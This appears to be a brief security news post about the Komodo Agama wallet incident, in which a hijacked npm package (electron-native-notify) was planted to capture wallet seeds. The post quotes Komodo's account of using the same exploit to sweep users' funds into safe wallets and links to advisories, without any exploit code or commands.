Komodo - unique security vulnerability

There is peculiar news of "Komodo hacking itself".

From Komodo: https://support.komodoplatform.com/support/solutions/articles/29000029932-agama-security-announcement

On Wednesday the 5th of June, the Komodo team were made aware of an issue with the Agama wallet that potentially put some user's funds at risk. Details and a timeline of events will be published once the necessary steps have been taken to secure funds and fix the problem.

After discovering the vulnerability, our Cyber Security Team used the same exploit to gain control of a lot of affected seeds and secure the funds at risk. We were able to sweep around 8 million KMD and 96 BTC from the vulnerable wallets, which otherwise would have been easy pickings for the attacker. The safe wallets RSgD2cmm3niFRu2kwwtrEHoHMywJdkbkeF (KMD) and 1GsdquSqABxP2i7ghUjAXdtdujHjVYLgqk (BTC) are under the control of the Komodo Team, and assets can be reclaimed by their owners. See our support page article for details.

The attack is similar to the "Supply chain" attack on CCleaner [https://blog.talosintelligence.com/2017/09/avast-distributes-malware.html] or PyPI Python repository hit by typosquatting sneak attack [https://nakedsecurity.sophos.com/2017/09/19/pypi-python-repository-hit-by-typosquatting-sneak-attack/]

In this case, the npm package electron-native-notify was hijacked and planted with logic to capture seeds at a later point in time. With the large number of npm packages, it needs an hawks eye to notice attacks like this one.

More details can be found from npm log : http://blog.npmjs.org/post/185397814280/plot-to-steal-cryptocurrency-foiled-by-the-npm

If you are holding Komodo

Cross check the status of the funds and if there are discrepancies, check for details https://support.komodoplatform.com/support/solutions/articles/29000029932-agama-security-announcement